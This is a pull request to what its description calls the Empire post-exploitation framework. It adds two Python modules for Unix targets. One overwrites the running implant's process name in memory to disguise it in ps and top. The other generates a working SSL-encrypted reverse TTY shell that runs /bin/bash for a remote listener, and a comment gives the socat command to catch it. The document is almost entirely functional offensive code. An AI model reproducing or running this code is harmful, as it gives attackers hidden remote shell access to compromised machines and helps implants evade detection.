### PR TITLE
Module additions for *nix agents

### DIFF
--- a/lib/modules/python/management/multi/change_process_name.py
+++ b/lib/modules/python/management/multi/change_process_name.py
@@ -1,0 +1,95 @@
+from lib.common import helpers
+import pdb
+
+class Module:
+
+    def __init__(self, mainMenu, params=[]):
+
+        # metadata info about the module, not modified during runtime
+        self.info = {
+            # name for the module that will appear in module menus
+            'Name': 'Change Process Name',
+
+            # list of one or more authors for the module
+            'Author': ['FleiXius','calmhavoc'],
+
+            # more verbose multi-line description of the module
+            'Description': ("Overwrites process name in memory which changes the process name when viewed with tools such as ps and top"),
+
+            # True if the module needs to run in the background
+            'Background' : False,
+
+            # File extension to save the file as
+            'OutputExtension' : "",
+
+            # if the module needs administrative privileges
+            'NeedsAdmin' : False,
+
+            # True if the method doesn't touch disk/is reasonably opsec safe
+            'OpsecSafe' : True,
+
+            # the module language
+            'Language' : 'python',
+
+            # the minimum language version needed
+            'MinLanguageVersion' : '2.6',
+
+            # list of any references/other comments
+            'Comments': []
+        }
+
+        # any options needed by the module, settable during runtime
+        self.options = {
+            'Agent' : {
+                'Description'   :   'Agent to execute module on.',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'ProcessName' : {
+                'Description'   :   'New process name for the current implant; 15 character max',
+                'Required'      :   True,
+                'Value'         :   '/usr/bin/python'
+            }
+        }
+
+        # save off a copy of the mainMenu object to access external functionality
+        #   like listeners/agent handlers/etc.
+        self.mainMenu = mainMenu
+
+        # During instantiation, any settable option parameters
+        #   are passed as an object set to the module and the
+        #   options dictionary is automatically set. This is mostly
+        #   in case options are passed on the command line
+        if params:
+            for param in params:
+                # parameter format is [Name, Value]
+                option, value = param
+                if option in self.options:
+                    self.options[option]['Value'] = value
+
+    def generate(self, obfuscate=False, obfuscationCommand=""):
+        processName = self.options['ProcessName']['Value']
+        script = """
+import ctypes
+from ctypes.util import find_library
+libc = ctypes.CDLL(find_library('c'))
+name = '%s'
+argv = ctypes.POINTER(ctypes.POINTER(ctypes.c_char))()
+argc = ctypes.c_int()
+ctypes.pythonapi.Py_GetArgcArgv(ctypes.byref(argc), ctypes.byref(argv))
+memset = libc.memset
+memset.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.c_size_t]
+memset.restype = ctypes.c_void_p
+strlen = libc.strlen
+strlen.argtypes = [ctypes.c_void_p]
+strlen.restype = ctypes.c_size_t
+libc.strncpy(argv[0], name, len(name))
+for x in xrange(1, int(argc.value)):
+  libc.strncpy(argv[x], ' ' * strlen(argv[x]), strlen(argv[x]))
+new_name = ctypes.addressof(argv[0].contents) + len(name)
+libc.memset(new_name, 0, strlen(new_name))
+libc.prctl(15, ctypes.c_char_p(name), 0, 0, 0)
+""" % (processName)
+
+
+        return script

--- a/lib/modules/python/management/multi/spawn_tty_shell.py
+++ b/lib/modules/python/management/multi/spawn_tty_shell.py
@@ -1,0 +1,106 @@
+class Module:
+
+    def __init__(self, mainMenu, params=[]):
+
+        # metadata info about the module, not modified during runtime
+        self.info = {
+            # name for the module that will appear in module menus
+            'Name': 'TTY Shell Spawn',
+
+            # list of one or more authors for the module
+            'Author': ['calmhavoc'],
+
+            # more verbose multi-line description of the module
+            'Description': ('Spawns a reverse shell with TTY support over HTTPS'),
+
+            # True if the module needs to run in the background
+            'Background' : True,
+
+            # File extension to save the file as
+            'OutputExtension' : '',
+
+            # if the module needs administrative privileges
+            'NeedsAdmin' : False,
+
+            # True if the method doesn't touch disk/is reasonably opsec safe
+            'OpsecSafe' : True,
+
+            # the module language
+            'Language' : 'python',
+
+            # the minimum language version needed
+            'MinLanguageVersion' : '2.6',
+
+            # list of any references/other comments
+            'Comments': ['Listen with: socat `tty`,raw,echo=0 openssl-listen:443,reuseaddr,cert=cert.pem,verify=0','' ]
+        }
+
+        # any options needed by the module, settable during runtime
+        self.options = {
+            # format:
+            #   value_name : {description, required, default_value}
+            'Agent' : {
+                # The 'Agent' option is the only one that MUST be in a module
+                'Description'   :   'Agent to execute module on.',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'Host' : {
+                'Description'   :   'Listening HTTPS Host; eg host running: socat `tty`,raw,echo=0 openssl-listen:443,reuseaddr,cert=cert.pem,verify=0',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'Port' : {
+                'Description'   :   'Target port , 443 is default.',
+                'Required'      :   True,
+                'Value'         :   '443'
+            }
+                    }
+
+        self.mainMenu = mainMenu
+
+        if params:
+            for param in params:
+                option, value = param
+                if option in self.options:
+                    self.options[option]['Value'] = value
+
+    def generate(self, obfuscate=False, obfuscationCommand=""):
+        host = self.options['Host']['Value']
+        port = self.options['Port']['Value']
+
+        script = """
+import socket,sys,subprocess,os
+import pty
+import ssl
+import select
+
+
+def main(host,port):
+    ADDRESS = (host, int(port))
+    sslSock = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM), ssl_version=ssl.PROTOCOL_SSLv23)
+    sslSock.connect(ADDRESS)
+    master, slave = pty.openpty()
+    myterm = subprocess.Popen(["/bin/bash"],preexec_fn=os.setsid,stdin=slave, stdout=slave, stderr=slave,
+                            universal_newlines=True)
+
+    try:
+        while myterm.poll() is None:  
+            rlist, wlist, xlist = select.select([sslSock, master], [], [])  
+            if sslSock in rlist:
+                try:
+                    data = sslSock.recv(1024)
+                except Exception as e:
+                    print str(e)
+                if not data:break
+                while sslSock.pending():
+                    data += sslSock.recv(sslSock.pending())
+                os.write(master, data)
+            elif master in rlist:  
+                sslSock.write(os.read(master, 1024))
+    finally:
+        sslSock.close()
+
+main("%s","%s")
+""" % (host,port)
+        return script


### PR DESCRIPTION
New pull to replace closed #1140 that had a major EBCAK error :-)

Added two modules for *nix based targets. One spawns an SSL encrypted TTY shell to a remote listener and the other enables arbitrary renaming of the Empire process (/usr/bin/python) to anything within a 15 character limit.